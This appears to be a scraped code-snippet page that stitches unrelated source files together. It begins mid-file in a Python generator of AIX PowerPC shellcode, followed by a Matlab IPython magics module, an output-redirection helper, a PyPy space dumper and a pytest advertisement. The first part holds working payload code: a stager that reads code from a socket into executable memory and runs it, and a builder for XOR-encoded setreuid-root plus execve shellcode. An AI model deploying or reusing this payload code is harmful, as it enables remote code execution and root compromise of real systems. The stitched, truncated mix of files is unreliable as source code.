bufsize1064 ! r21 = pcloc1065 ! r28 = codeptr1066 ! r20 = tmp1067 ! r18 = main_loop1068 1069 ! before all asm code (MOSDEF entry point)1070 read_and_exec_loop:1071 1072 ! get our current location in memory1073 xor. r6, r6, r61074 bnel read_and_exec_loop1075 ! <-- that addr is now in $lr1076 pcloc:1077 mflr r211078 1079 """1080 1081 # if fd is already in $r30 we wont set it again just because it's nicer1082 # but we also save 4 bytes!!!1083 if str(args["fd"]) != "r30":1084 code += """1085 ! set provided sockfd1086 FD_SET_INSTR r30, FD ! fd1087 """1088 code += """1089 1090 ! get errno1091 lwz r25, 20(r1)1092 lwz r25, 64(r25) ! r25 = &errno1093 1094 ! mmap(0, 0x10000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANON, -1, 0);1095 li r3, 01096 lis r4, 11097 li r5, mmap_protections1098 li r6, MAP_ANON1099 li r7, -11100 mr r8, r31101 addi r20, r21, mmap_out - pcloc1102 mtlr r201103 li r2, SYS_mmap1104 crorc 6, 6, 61105 sc1106 mmap_out:1107 1108 cmpwi r3, MAP_FAILED1109 beq- failed1110 mr r31, r3 ! r31 = codebuf1111 1112 ! save <here> in r18 to come back directly here after exec the mmap buffer1113 addi r18, r21, main_loop - pcloc1114 1115 main_loop:1116 1117 ! set the first instruction of the mmap buffer: restore lr from r181118 set r28, restore_lr_after_jmp - pcloc1119 lwzx r28, r21, r281120 stw r28, 0(r31)1121 1122 ! read(FD, &nbytes, sizeof(nbytes));1123 read_size:1124 mr r3, r30 ! r30 = sockfd1125 addi r4, r31, 4 ! &mmap[4]1126 li r5, 41127 addi r20, r21, readsize_out - pcloc1128 mtlr r201129 li r2, SYS_kread1130 crorc 6, 6, 61131 sc1132 readsize_out:1133 1134 cmplwi r3, 4 ! if (r != sizeof(nbytes))1135 beq+ readsize_is_4_valid1136 cmpwi r3, -11137 bne- failed1138 lwz r4,0(r25) ! errno1139 cmpwi r4, EINTR ! errno == EINTR?1140 beq- read_size1141 b failed1142 readsize_is_4_valid:1143 lwz r29, 4(r31) ! r29 = *mmap[4] = codesize1144 1145 ! prepare r28 before read loop1146 addi r28, r31, 4 ! r28 = mmap_ptr = &mmap[4]1147 1148 ! read(FD, codeptr, nbytes);1149 read_buf:1150 cmpwi r29, 0 ! while (nbytes) ! do we still need to read some bytes?1151 beq- exec_code ! if no, we can exec the recently read code1152 mr r3, r30 ! arg0 = r30 = sockfd1153 mr r4, r28 ! arg1 = mmap_ptr1154 mr r5, r29 ! arg2 = codesize1155 addi r20, r21, read_out - pcloc1156 mtlr r201157 li r2, SYS_kread1158 crorc 6, 6, 61159 sc1160 read_out:1161 1162 cmpwi r3, 01163 bgt+ read_out_ok ! we read smth1164 beq- failed ! read() returned 0: connection closed1165 ! here read() returned -1, we have to check errno1166 lwz r4, 0(r25) ! errno1167 cmpwi r4, EINTR1168 beq- read_buf ! if errno == EINTR: retry to read1169 b failed ! else we are mucked up1170 read_out_ok:1171 add r28, r28, r3 ! mmap_ptr += read_size1172 subfc r29, r3, r29 ! codesize -= read_size1173 bne- read_buf ! if codesize != 0: continue to read on sockfd1174 1175 exec_code:1176 mtlr r311177 li r2, SYS_sync1178 crorc 6, 6, 61179 sc1180 1181 ! _exit(random)1182 failed:1183 li r2, SYS__exit1184 crorc 6, 6, 61185 sc1186 1187 ! never reached1188 1189 ! following is used to patch sent code1190 restore_lr_after_jmp:1191 mtlr r181192 """1193 syscalls = ["SYS_mmap", "SYS_kread", "SYS__exit", "SYS_sync"]1194 constants = ["EINTR", "MAP_ANON", "MAP_FAILED"]1195 code = self.libc.patch_defines_with_values(code, syscalls + constants)1196 code = code.replace('mmap_protections', "%s" % mmap_protections)1197 code = code.replace("FD_SET_INSTR", fd_set_instr)1198 code = code.replace("FD", str(args["fd"]))1199 self.code+=code1200 1201 def munmap_caller(self, args): # TODO: supply size in argument1202 # this code must be at the begining of a codebuffer send to read_exec...1203 # it will munmap the page of the caller1204 # munmap(lr & ~0xffff, 0x10000)1205 1206 code="""1207 mflr r31208 munmap_caller:1209 xor. r6, r6, r61210 bnel- munmap_caller1211 ! <-- that addr is now in $lr1212 munmap_pc:1213 mflr r01214 addi r0, r0, munmap_out - munmap_pc1215 mtlr r01216 lis r2, -1 ! ~(0x10000 - 1)1217 and r3, r3, r2 ! r3 = ctr & ~(0x10000 - 1)1218 lis r4, 11219 li r2, SYS_munmap1220 crorc 6, 6, 61221 sc1222 munmap_out:1223 ! code continue here1224 """1225 code = self.libc.patch_defines_with_values(code, ["SYS_munmap"])1226 self.code += code1227 1228 def sendreg(self,args):1229 # send a 32-Bit register1230 fdreg = args["fdreg"]1231 #print "fdreg=%s"%fdreg1232 code="""1233 stwu r1, -144(r1)1234 stmw r2, 4(r1)1235 stw REGTOSEND, 140(r1)1236 sendreg:1237 xor. r6, r6, r61238 bnel sendreg1239 sendreg_here_in_lr:1240 mflr r201241 mr r3, FDREG ! arg01242 addi r4, r1,140 ! arg1 = buf1243 li r5, 4 ! arg2 = sizeof(int32) = 41244 addi r21, r20, sendreg_out - sendreg_here_in_lr1245 mtlr r211246 li r2, SYS_write1247 crorc 6, 6, 61248 sc1249 sendreg_out:1250 lmw r2, 4(r1)1251 lwz r1, 0(r1)1252 """1253 code=code.replace("FDREG",args["fdreg"])1254 code=code.replace("REGTOSEND",args["regtosend"])1255 code = self.libc.patch_defines_with_values(code, ["SYS_write"])1256 self.code+=code1257 1258 # This is the proper way to flush the caches on AIX .. you call1259 # SYS_sync and set the link register to the code you want to1260 # return to .. we also have to do this for our mosdef callbacks1261 # and anything else that reads in code ..1262 #1263 # e.g. in pseudo-code1264 #1265 # code = read(1024)1266 # flushcache(code)1267 # {1268 # mtrl %0 : : "r" (code)1269 # SYS_sync() -> returns to code via link register1270 # }1271 #1272 def flushcache(self,args):1273 # flush the cache where $pc is, and continue code execution1274 code="""1275 flushcache:1276 xor. r6, r6, r61277 bnel flushcache1278 flushcache_here_in_lr:1279 mflr r201280 addi r20, r20, flushcache_out - flushcache_here_in_lr1281 mtlr r201282 li r2, SYS_sync1283 crorc 6, 6, 61284 sc1285 flushcache_out:1286 ! continue code execution1287 """1288 code = self.libc.patch_defines_with_values(code, ["SYS_sync"])1289 self.code+=code1290 1291 def test(self):1292 self.addAttr("read_and_exec_loop", {'fd': -1})1293 self.addAttr("exit", None)1294if __name__=="__main__":1295 sc = aix_powerpc(version = '5.2')1296 sc.addAttr('setreuid', { 'ruid' : 0, 'euid' : 0 })1297 sc.addAttr('execve', None)1298 data = sc.get()1299 encoded = sc.xor_encode(data, xormask=0xae)1300 print("Payload: %d bytes" % len(encoded))1301 n = 0 1302 for c in encoded:1303 if n == 0:1304 sys.stdout.write("\"")1305 sys.stdout.write("\\x%.2x" % ord(c))1306 n += 11307 if n == 4:1308 n = 0...
IPythonMagics.py
Source:IPythonMagics.py
1from IPython import get_ipython2from IPython.core import magic_arguments3from IPython.core.magic import Magics, magics_class, line_magic4from IPython.display import Image, display5import ipykernel6import threading7import ctypes8import time9import sys10import io11import os12try:13 from tempfile import TemporaryDirectory, TemporaryFile, NamedTemporaryFile14except ImportError:15 from backports.tempfile import TemporaryDirectory, TemporaryFile, NamedTemporaryFile16_magic_class_ref = None17# We will overload the `post_run_cell` event with this function18# That callback is a method of `EventManager` hence the `self` argument19def showPlot(self=None, result=None):20 # We use a global reference to the magics class to get the reference to Matlab interpreter21 # If it doesn't exist, we can't do anything, and assume the user is just using Python22 ip = get_ipython()23 if ip is None or _magic_class_ref is None or _magic_class_ref.plot_type != 'inline':24 return25 try:26 from matlab import double as md27 except ImportError:28 return29 else:30 if _magic_class_ref.m is None:31 from . import Matlab32 _magic_class_ref.m = Matlab().interface33 interface = _magic_class_ref.m34 nfig = len(interface.call('get',(0., "children")))35 if nfig == 0:36 return37 if _magic_class_ref.next_pars:38 width, height, resolution = (_magic_class_ref.next_pars[idx] for idx in ['width', 'height', 'resolution'])39 else:40 width, height, resolution = (_magic_class_ref.width, _magic_class_ref.height, _magic_class_ref.resolution)41 interface.call('set', (0., 'defaultfigurepaperposition', md([0, 0, width / resolution, height / resolution])), nargout=0)42 interface.call('set', (0., 'defaultfigurepaperunits', 'inches'), nargout=0)43 format = 'png'44 with TemporaryDirectory() as tmpdir:45 try:46 interface.call('eval',47 ["arrayfun(@(h, i) print(h, sprintf('{}/%i', i), '-d{}', '-r{}'),get(0, 'children'), (1:{})')"48 .format('/'.join(tmpdir.split(os.sep)), format, resolution, nfig)],49 nargout=0)50 interface.call('eval', ["arrayfun(@(h) close(h), get(0, 'children'))"], nargout=0)51 for fname in sorted(os.listdir(tmpdir)):52 display(Image(filename=os.path.join(tmpdir, fname)))53 except Exception as exc:54 ip.showtraceback()55 return56 finally:57 interface.call('set', (0., 'defaultfigurevisible', 'off'), nargout=0)58 if _magic_class_ref.next_pars:59 _magic_class_ref.next_pars = None60# Matlab writes to the C-level stdout / stderr file descriptors61# whereas IPython overloads the Python-level sys.stdout / sys.stderr streams62# To force Matlab output into the IPython cells we need to 63# 1. Duplicate the stdout/err file descriptors into a pipe (with os.dup2)64# 2. Create a thread which watches the pipe and re-prints to IPython65# See: https://stackoverflow.com/questions/41216215/66# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/67class Redirection(object):68 # Class which redirects a C-level file descriptor to the equiv. IPython stream69 thread = None70 stop_flag = None71 saved_fd = None72 read_pipe = None73 exc_info = None74 def __init__(self, target='stdout'):75 self.target = {'stdout':sys.__stdout__, 'stderr':sys.__stderr__}[target].fileno()76 self.output = {'stdout':sys.stdout, 'stderr':sys.stderr}[target]77 self.ip = get_ipython()78 self.flush = lambda: None79 def not_redirecting(self):80 return (81 self.ip is None or _magic_class_ref is None or82 (_magic_class_ref.output != 'inline' and self.saved_fd == None)83 )84 def pre(self):85 if self.not_redirecting():86 return87 if self.saved_fd == None:88 self.saved_fd = os.dup(self.target)89 self.read_pipe, write_pipe = os.pipe()90 os.dup2(write_pipe, self.target)91 os.close(write_pipe)92 def redirect_thread():93 try:94 while not self.stop_flag:95 raw = os.read(self.read_pipe, 1000)96 if raw:97 self.output.write(raw.decode())98 self.flush()99 except Exception:100 self.exc_info = sys.exc_info()101 self.stop_flag = False102 self.thread = threading.Thread(target=redirect_thread)103 self.thread.daemon = True # Makes the thread non-blocking104 self.thread.start()105 def showtraceback(self):106 self.ip.showtraceback()107 def post(self):108 if self.not_redirecting() or self.saved_fd == None:109 return110 sys.stdout.flush()111 os.dup2(self.saved_fd, self.target)112 self.stop_flag = True113 os.close(self.read_pipe)114 os.close(self.saved_fd)115 if sys.platform.startswith("linux") or sys.platform.startswith("darwin"):116 self.thread.join()117 self.thread = None118 self.saved_fd = None119 if self.exc_info:120 self.showtraceback()121@magics_class122class MatlabMagics(Magics):123 """124 Class for IPython magics for interacting with Matlab125 It defines several magic functions:126 %pace - sets up the plotting environment (default 'inline')127 %matlab_fig - defines the inline figure size and resolution for the next plot only128 """129 def __init__(self, shell, interface):130 super(MatlabMagics, self).__init__(shell)131 self.m = interface132 self.shell = get_ipython().__class__.__name__133 self.output = 'inline'134 self.plot_type = 'inline' if self.shell == 'ZMQInteractiveShell' \135 else 'windowed'136 self.width = 400137 self.height = 300138 self.resolution = 300139 self.next_pars = None140 global _magic_class_ref141 _magic_class_ref = self142 @line_magic143 @magic_arguments.magic_arguments()144 @magic_arguments.argument('plot_type', type=str, help="Matlab plot type, either: 'inline' or 'windowed'")145 @magic_arguments.argument('output', nargs='?', type=str, help="Matlab output, either: 'inline' or 'console'")146 @magic_arguments.argument('-w', '--width', type=int, help="Default figure width in pixels [def: 400]")147 @magic_arguments.argument('-h', '--height', type=int, help="Default figure height in pixels [def: 300]")148 @magic_arguments.argument('-r', '--resolution', type=int, help="Default figure resolution in dpi [def: 150]")149 def pace(self, line):150 """Set up pace_neutrons to work with IPython notebooks151 152 Use this magic function to set the behaviour of Matlab programs Horace and SpinW in Python.153 You can specify how plots should appear: either 'inline' [default] or 'windowed'.154 You can also specify how Matlab text output from functions appear: 'inline' [default] or 'console'155 Examples156 --------157 By default the inline backend is used for both figures and outputs. 158 To switch behaviour use, use:159 In [1]: %pace windowed # windowed figures, output unchanged ('inline' default)160 In [2]: %pace console # figure unchanged ('inline' default), console output161 In [3]: %pace windowed console # windowed figures, console output162 In [4]: %pace inline inline # inline figures, inline output163 In [5]: %pace inline # inline figures, inline output164 In [6]: %pace inline console # inline figures, console output165 In [7]: %pace windowed inline # windowed figures, console output166 Note that if you specify `%pace inline` this sets `'inline'` for _both_ figures and outputs.167 If you want inline figures and console outputs or windowed figures and inline output you must specify168 that specifically.169 Note that using (default) inline text output imposes a slight performance penalty.170 For inlined figures, you can also set the default figure size and resolution with171 In [8]: %pace inline --width 400 --height 300 --resolution 150172 The values are in pixels for the width and height and dpi for resolution. A short cut:173 In [9]: %pace inline -w 400 -h 300 -r 150174 Also works. The width, height and resolution only applies to inline figures.175 You should use the usual Matlab commands to resize windowed figures.176 """177 args = magic_arguments.parse_argstring(self.pace, line)178 plot_type = args.plot_type if args.plot_type else self.plot_type179 output = args.output if args.output else self.output180 if args.plot_type and args.plot_type == 'inline' and args.output == None:181 output = 'inline'182 self.output = output183 if plot_type == 'inline':184 self.plot_type = plot_type185 if args.width: self.width = args.width186 if args.height: self.height = args.height187 if args.resolution: self.resolution = args.resolution188 elif plot_type == 'windowed':189 self.plot_type = plot_type190 else:191 raise RuntimeError(f'Unknown plot type {plot_type}')192 try:193 import matlab194 except ImportError:195 return196 if plot_type == 'inline':197 self.m.call('set', (0., 'defaultfigurevisible', 'off'), nargout=0)198 self.m.call('set', (0., 'defaultfigurepaperpositionmode', 'manual'), nargout=0)199 elif plot_type == 'windowed':200 self.m.call('set', (0., 'defaultfigurevisible', 'on'), nargout=0)201 self.m.call('set', (0., 'defaultfigurepaperpositionmode', 'auto'), nargout=0)202 else:203 raise RuntimeError(f'Unknown plot type {plot_type}')204 @line_magic205 @magic_arguments.magic_arguments()206 @magic_arguments.argument('-w', '--width', type=int, help="Default figure width in pixels [def: 400]")207 @magic_arguments.argument('-h', '--height', type=int, help="Default figure height in pixels [def: 300]")208 @magic_arguments.argument('-r', '--resolution', type=int, help="Default figure resolution in dpi [def: 150]")209 def matlab_fig(self, line):210 """Defines size and resolution of the next inline Matlab figure to be plotted211 Use this magic function to define the figure size and resolution of the next figure212 (and only that figure) without changing the default size and resolution.213 Examples214 --------215 Size and resolution is specified as options, any which is not defined here will use the default values216 These values are reset after the figure is plotted (default: width=400, height=300, resolution=150)217 In [1]: %matlab_fig -w 800 -h 200 -r 300218 m.plot(-pi:0.01:pi, sin(-pi:0.01:pi), '-')219 In [2]: m.plot(-pi:0.01:pi, cos(-pi:0.01:pi), '-')220 The sine graph in the first cell will be 800x200 at 300 dpi, whilst the cosine graph is 400x300 150 dpi.221 """222 args = magic_arguments.parse_argstring(self.matlab_fig, line)223 width = args.width if args.width else self.width224 height = args.height if args.height else self.height225 resolution = args.resolution if args.resolution else self.resolution...
redirections.py
Source:redirections.py
1"""Capture & redirect output from 3rd party C/C++ libraries2Inspired from code by Eli Bendersky3https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/#id14"""5import typing, traceback6from contextlib import contextmanager7import ctypes8import io9import os, sys10import tempfile11libc = ctypes.CDLL(None)12c_stdout = ctypes.c_void_p.in_dll(libc, 'stdout')13c_stderr = ctypes.c_void_p.in_dll(libc, 'stderr')14#@contextmanager15#def output_stream_redirector(stream, 16 #what:typing.Optional[typing.Union[io.TextIOWrapper, str, int]]=sys.stdout):17 #if isinstance(what, str):18 #if what.lower() not in ("out", "stdout", "err", "stderr"):19 #p_stream = sys.stdout20 #c_stream = c_stdout21 ##raise ValueError(f"Incorrect output stream specification; expecting 'out' or 'err' got {what}")22 #else:23 ## NOTE: this is the python stream24 #p_stream = sys.stderr if what.lower() in ("err", "stderr") else sys.stdout25 #c_stream = c_stderr if what.lower() in ("err", "stderr") else c_stdout26 27 #elif isinstance(what, int):28 #if what not in (1,2):29 #p_stream = sys.stdout30 #c_stream = c_stdout31 ##raise ValueError(f"Incorrect output stream descriptor; expecting one of 1, 2; got {what}")32 #else:33 #p_stream = sys.stderr if what == 2 else sys.stdout34 #c_stream = c_stderr if what == 2 else c_stdout35 36 ##original_fd = what37 38 #elif what in (sys.stdout, sys.stderr):39 #p_stream = what40 #c_stream = c_stderr if what is sys.stderr else c_stdout41 42 #else:43 #p_stream = sys.stdout44 #c_stream = c_stdout45 ##raise TypeError(f"Expecting an one of sys.stdout or sys.stderr; got {type(what).__name__}")46 47 #original_fd = p_stream.fileno()48 49 ## NOTE: 2021-11-30 12:36:2950 ## The original fd points to. On POSIX systems this is isually 1 for stdout51 ## and 2 for stderr52 ##original_stdout_fd = sys.stdout.fileno()53 #def _redirect_(ostr, to_fd):54 #"""Redirect stdout to the given file descriptor."""55 ## Flush the C-level buffer stdout56 #libc.fflush(c_stream)57 ## Flush and close sys.stdout - also closes the file descriptor (fd)58 #ostr.close()59 ## Make original_stdout_fd point to the same file as to_fd60 #os.dup2(to_fd, original_fd)61 ## Create a new sys.stdout that points to the redirected fd62 #ostr = io.TextIOWrapper(os.fdopen(original_fd, 'wb'))63 #return ostr64 ## Save a copy of the original stdout fd in saved_stdout_fd65 #saved_fd = os.dup(original_fd)66 67 #try:68 ## Create a temporary file and redirect stdout to it69 #tfile = tempfile.TemporaryFile(mode='w+b')70 #p_stream = _redirect_(p_stream, tfile.fileno())71 ## Yield to caller, then redirect stdout back to the saved fd72 #yield73 #p_stream = _redirect_(p_stream, saved_fd)74 ## Copy contents of temporary file to the given stream75 #tfile.flush()76 #tfile.seek(0, io.SEEK_SET)77 #stream.write(tfile.read().decode())78 #finally:79 #tfile.close()80 #os.close(saved_fd)81 82@contextmanager83def stdout_redirector(stream):84 """FIXME: 2021-11-30 15:04:2485 Subsequent error messages from Python code(via sys.stderr) do not show up 86 anymore until after Scipyen has been closed. 87 """88 libc = ctypes.CDLL(None)89 c_stdout = ctypes.c_void_p.in_dll(libc, 'stdout')90 #c_stderr = ctypes.c_void_p.in_dll(libc, 'stderr')91 # The original fd stdout points to. Usually 1 on POSIX systems.92 original_stdout_fd = sys.stdout.fileno()93 def _redirect_(to_fd):94 """Redirect stdout to the given file descriptor."""95 # Flush the C-level buffer stdout96 libc.fflush(c_stdout)97 # Flush and close sys.stdout - also closes the file descriptor (fd)98 sys.stdout.close()99 # Make original_stdout_fd point to the same file as to_fd100 os.dup2(to_fd, original_stdout_fd)101 # Create a new sys.stdout that points to the redirected fd102 sys.stdout = io.TextIOWrapper(os.fdopen(original_stdout_fd, 'wb'))103 # Save a copy of the original stdout fd in saved_stdout_fd104 saved_stdout_fd = os.dup(original_stdout_fd)105 try:106 # Create a temporary file and redirect stdout to it107 tfile = tempfile.TemporaryFile(mode='w+b')108 _redirect_(tfile.fileno())109 # Yield to caller, then redirect stdout back to the saved fd110 yield111 _redirect_(saved_stdout_fd)112 # Copy contents of temporary file to the given stream113 tfile.flush()114 tfile.seek(0, io.SEEK_SET)115 stream.write(tfile.read().decode())116 finally:117 tfile.close()118 os.close(saved_stdout_fd)119 120@contextmanager121def stderr_redirector(stream):122 #libc = ctypes.CDLL(None)123 #c_stdout = ctypes.c_void_p.in_dll(libc, 'stdout')124 #c_stderr = ctypes.c_void_p.in_dll(libc, 'stderr')125 print(type(sys.stderr))126 # The original fd stdout points to. Usually 1 on POSIX systems.127 original_stderr_fd = sys.stderr.fileno()128 #print("original", original_stderr_fd)129 #system_stderr_fd = sys.stderr.fileno() # also save this130 def _redirect_(to_fd):131 """Redirect stderr to the given file descriptor."""132 # Flush the C-level buffer stderr133 libc.fflush(c_stderr)134 135 # Flush and close sys.stderr - also closes the file descriptor (fd)136 sys.stderr.close()137 138 # Make original_stderr_fd point to the same file as to_fd:139 # duplicate to_fd to original_stderr_fd;140 #print(f"in _redirect_ before dup2: to_fd: {to_fd}, original_stderr_fd, {original_stderr_fd}")141 os.dup2(to_fd, original_stderr_fd)142 #print(f"in _redirect_ after dup2: to_fd: {to_fd}, original_stderr_fd, {original_stderr_fd}")143 # now 'original_stderr_fd' is a duplicate of 'to_fd'144 145 # Create a new sys.stderr that points to the redirected fd146 sys.stderr = io.TextIOWrapper(os.fdopen(original_stderr_fd, 'wb'))147 148 #original_stderr= os.fdopen(original_stderr_fd, 'wb')149 #print(type(original_stderr))150 #sys.stderr = io.TextIOWrapper(original_stderr)151 #original_stderr.flush()152 #print(type(original_stderr.fileno()))153 #os.fsync(original_stderr_fd)154 # Save a copy of the original stderr fd in saved_stderr_fd155 saved_stderr_fd = os.dup(original_stderr_fd)156 #print("saved", saved_stderr_fd)157 try:158 # Create a temporary file and redirect stderr to it159 tfile = tempfile.TemporaryFile(mode='w+b')160 # this call duplictes tfile's fd to original_stderr_fd and replaces161 # sys.stderr with a new stream fdopen-ed on tfile's fd162 _redirect_(tfile.fileno())163 # Yield to caller, then redirect stderr back to the saved fd164 yield165 # next: duplicates saved_stderr_fd to original_stderr_fd; replaces166 # sys.stderr with a new one fdopen-ed on saved_stderr_fd167 _redirect_(saved_stderr_fd)168 # Copy contents of temporary file to the given stream169 tfile.flush()170 tfile.seek(0, io.SEEK_SET)171 #sys.stderr.write(tfile.read().decode())172 stream.write(tfile.read().decode())173 #except: # NOTE: 2021-11-30 14:48:20174 #traceback.print_exc()175 #_redirect_(saved_stderr_fd)176 ## Copy contents of temporary file to the given stream177 #tfile.flush()178 #tfile.seek(0, io.SEEK_SET)179 #sys.stderr.write(tfile.read().decode())180 ##stream.write(tfile.read().decode())181 finally:182 #print("finally: saved", saved_stderr_fd)183 #print("finally: original", original_stderr_fd)184 #print(saved_stderr_fd is original_stderr_fd)185 tfile.close()186 os.close(saved_stderr_fd)187 sys.stderr = sys.__stderr__188 #os.fsync(original_stderr_fd) # invalid argument!189 #original_stderr_fd = os.dup(saved_stderr_fd)190 #sys.stderr = io.TextIOWrapper(os.fdopen(system_stderr_fd, 'wb'))191 ...
dump.py
Source:dump.py
1import os2from pypy.objspace.proxy import patch_space_in_place3from pypy.objspace.std.objspace import StdObjSpace, W_Object4from pypy.interpreter.error import OperationError5from pypy.interpreter import baseobjspace6DUMP_FILE_NAME = 'pypy-space-dump'7DUMP_FILE_MODE = 06008class Dumper(object):9 dump_fd = -110 def __init__(self, space):11 self.space = space12 self.dumpspace_reprs = {}13 def open(self):14 space = self.space15 self.dumpspace_reprs.update({16 space.w_None: 'None',17 space.w_False: 'False',18 space.w_True: 'True',19 })20 if self.dump_fd < 0:21 self.dump_fd = os.open(DUMP_FILE_NAME,22 os.O_WRONLY|os.O_CREAT|os.O_TRUNC,23 DUMP_FILE_MODE)24 def close(self):25 if self.dump_fd >= 0:26 os.close(self.dump_fd)27 self.dump_fd = -128 self.dumpspace_reprs.clear()29 def dump_get_repr(self, w_obj):30 try:31 return self.dumpspace_reprs[w_obj]32 except KeyError:33 saved_fd = self.dump_fd34 try:35 self.dump_fd = -136 space = self.space37 if isinstance(w_obj, W_Object):38 w_type = space.type(w_obj)39 else:40 w_type = None41 if w_type is space.w_int:42 n = space.int_w(w_obj)43 s = str(n)44 elif w_type is space.w_str:45 s = space.str_w(w_obj)46 digit2hex = '0123456789abcdef'47 lst = ["'"]48 for c in s:49 if c == '\\':50 lst.append('\\')51 if c >= ' ':52 lst.append(c)53 else:54 lst.append('\\')55 if c == '\n':56 lst.append('n')57 elif c == '\t':58 lst.append('t')59 else:60 lst.append('x')61 lst.append(digit2hex[ord(c) >> 4])62 lst.append(digit2hex[ord(c) & 0xf])63 lst.append("'")64 s = ''.join(lst)65 elif w_type is space.w_float:66 n = space.float_w(w_obj)67 s = str(n)68 else:69 s = '%s at 0x%x' % (w_obj, id(w_obj))70 self.dumpspace_reprs[w_obj] = s71 finally:72 self.dump_fd = saved_fd73 return s74 def dump_enter(self, opname, args_w):75 if self.dump_fd >= 0:76 text = '\t'.join([self.dump_get_repr(w_arg) for w_arg in args_w])77 os.write(self.dump_fd, '%s CALL %s\n' % (opname, text))78 def dump_returned_wrapped(self, opname, w_obj):79 if self.dump_fd >= 0:80 s = self.dump_get_repr(w_obj)81 os.write(self.dump_fd, '%s RETURN %s\n' % (opname, s))82 def dump_returned(self, opname):83 if self.dump_fd >= 0:84 os.write(self.dump_fd, '%s RETURN\n' % (opname,))85 def dump_raised(self, opname, e):86 if self.dump_fd >= 0:87 if isinstance(e, OperationError):88 s = e.errorstr(self.space)89 else:90 s = '%s' % (e,)91 os.write(self.dump_fd, '%s RAISE %s\n' % (opname, s))92# for now, always make up a wrapped StdObjSpace93class DumpSpace(StdObjSpace):94 def __init__(self, *args, **kwds):95 self.dumper = Dumper(self)96 StdObjSpace.__init__(self, *args, **kwds)97 patch_space_in_place(self, 'dump', proxymaker)98 def _freeze_(self):99 # remove strange things from the caches of self.dumper100 # before we annotate101 self.dumper.close()102 return StdObjSpace._freeze_(self)103 def startup(self):104 StdObjSpace.startup(self)105 self.dumper.open()106 def finish(self):107 self.dumper.close()108 StdObjSpace.finish(self)109 def wrap(self, x):110 w_res = StdObjSpace.wrap(self, x)111 self.dumper.dump_returned_wrapped(' wrap', w_res)112 return w_res113 wrap._annspecialcase_ = "specialize:wrap"114Space = DumpSpace115# __________________________________________________________________________116nb_args = {}117op_returning_wrapped = {}118def setup():119 nb_args.update({120 # ---- irregular operations ----121 'wrap': 0,122 'str_w': 1,123 'int_w': 1,124 'float_w': 1,125 'uint_w': 1,126 'unicode_w': 1,127 'bigint_w': 1,128 'interpclass_w': 1,129 'unwrap': 1,130 'is_true': 1,131 'is_w': 2,132 'newtuple': 0,133 'newlist': 0,134 'newdict': 0,135 'newslice': 0,136 'call_args': 1,137 'marshal_w': 1,138 'log': 1,139 })140 op_returning_wrapped.update({141 'wrap': True,142 'newtuple': True,143 'newlist': True,144 'newdict': True,145 'newslice': True,146 'call_args': True,147 })148 for opname, _, arity, _ in baseobjspace.ObjSpace.MethodTable:149 nb_args.setdefault(opname, arity)150 op_returning_wrapped[opname] = True151 for opname in baseobjspace.ObjSpace.IrregularOpTable:152 assert opname in nb_args, "missing %r" % opname153setup()154del setup155# __________________________________________________________________________156def proxymaker(space, opname, parentfn):157 if opname == 'wrap':158 return None159 returns_wrapped = opname in op_returning_wrapped160 aligned_opname = '%15s' % opname161 n = nb_args[opname]162 def proxy(*args, **kwds):163 dumper = space.dumper164 args_w = list(args[:n])165 dumper.dump_enter(aligned_opname, args_w)166 try:167 res = parentfn(*args, **kwds)168 except Exception, e:169 dumper.dump_raised(aligned_opname, e)170 raise171 else:172 if returns_wrapped:173 dumper.dump_returned_wrapped(aligned_opname, res)174 else:175 dumper.dump_returned(aligned_opname)176 return res177 proxy.func_name = 'proxy_%s' % (opname,)...
Looking for an in-depth tutorial around pytest? LambdaTest covers the detailed pytest tutorial that has everything related to the pytest, from setting up the pytest framework to automation testing. Delve deeper into pytest testing by exploring advanced use cases like parallel testing, pytest fixtures, parameterization, executing multiple test cases from a single file, and more.
Skim our below pytest tutorial playlist to get started with automation testing using the pytest framework.
https://www.youtube.com/playlist?list=PLZMWkkQEwOPlcGgDmHl8KkXKeLF83XlrP
Get 100 minutes of automation test minutes FREE!!